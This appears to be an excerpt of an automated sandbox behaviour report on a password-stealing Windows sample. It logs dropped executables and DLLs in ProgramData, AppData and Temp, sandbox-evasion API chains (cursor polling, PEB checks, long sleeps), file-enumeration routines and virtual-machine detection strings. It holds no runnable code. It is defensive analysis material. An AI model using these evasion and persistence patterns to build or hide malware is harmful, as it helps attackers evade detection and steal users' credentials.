Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Sandbox detection routine: GetCursorPos, DecisionNode, Sleep			graph_2-109123

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

graph_2-109124

Found stalling execution ending in API Sleep call

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Stalling execution: Execution stalls by calling Sleep

graph_2-112239

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos,

2_2_0047BB80

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Window / User API: threadDelayed 380	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Window / User API: threadDelayed 4430
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Window / User API: threadDelayed 1889
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Window / User API: threadDelayed 1909

Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\autorun[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000397001\autorun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_2-109493

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

API coverage: 3.2 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe TID: 5072	Thread sleep count: 380 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe TID: 4552	Thread sleep count: 77 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe TID: 2156	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5824	Thread sleep count: 75 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7044	Thread sleep count: 60 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7044	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 936	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5712	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 5340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 5688	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 5340	Thread sleep count: 4430 > 30
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 5340	Thread sleep time: -4430000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 8484	Thread sleep count: 1889 > 30
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 8484	Thread sleep time: -1889000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 8512	Thread sleep count: 1909 > 30
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 8512	Thread sleep time: -1909000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 10016	Thread sleep count: 242 > 30
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 10016	Thread sleep time: -7260000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 8044	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 5340	Thread sleep count: 83 > 30
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe TID: 5340	Thread sleep time: -83000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004ADFC0 GetSystemTime followed by cmp: cmp eax, 04h and CTI: jc 004AE001h

2_2_004ADFC0

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00412090 CreateDirectoryA,FindFirstFileA,GetLastError,GetFileAttributesA,GetLastError,__Mtx_unlock,__Mtx_unlock,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,GetLastError,GetLastError,CreateDirectoryA,SHGetFolderPathA,GetFileAttributesA,GetLastError,__Mtx_unlock,GetFileAttributesA,GetLastError,__Mtx_unlock,__Mtx_unlock,CreateDirectoryA,GetFileAttributesA,GetLastError,__Mtx_unlock,__Mtx_unlock,GetFileAttributesA,GetLastError,__Mtx_unlock,__Mtx_unlock,CreateDirectoryA,GetFileAttributesA,GetLastError,__Mtx_unlock,__Mtx_unlock,GetFileAttributesA,GetLastError,__Mtx_unlock,__Mtx_unlock,CreateDirectoryA,GetFileAttributesA,GetLastError,__Mtx_unlock,__Mtx_unlock,GetFileAttributesA,GetLastError,__Mtx_unlock,__Mtx_unlock,CreateDirectoryA,__Mtx_unlock,	2_2_00412090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004F9505 FindClose,FindFirstFileExW,GetLastError,	2_2_004F9505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044CAA0 SHGetFolderPathA,GetFileAttributesA,GetLastError,GetLastError,__Mtx_unlock,GetFileAttributesA,GetLastError,__Mtx_unlock,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CopyFileA,GetFileAttributesA,GetLastError,__Mtx_unlock,__Mtx_unlock,CreateDirectoryA,CopyFileA,CopyFileA,__Mtx_unlock,__Mtx_unlock,	2_2_0044CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040DC90 FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,__Mtx_unlock,	2_2_0040DC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0044F3A0 FindFirstFileA,	2_2_0044F3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004F958B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	2_2_004F958B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00518980 FindFirstFileExW,	2_2_00518980
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0064C2A2 FindFirstFileExW,	16_2_0064C2A2
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_006868EE FindFirstFileW,FindClose,	16_2_006868EE
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0068698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	16_2_0068698F
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0067D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_0067D076
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0067D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_0067D3A9
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00689642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_00689642
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0068979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_0068979D
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00689B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	16_2_00689B2B
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0067DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	16_2_0067DBBE
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00685C97 FindFirstFileW,FindNextFileW,FindClose,	16_2_00685C97

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_0040FCB0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: Web Data.36.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Web Data.36.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
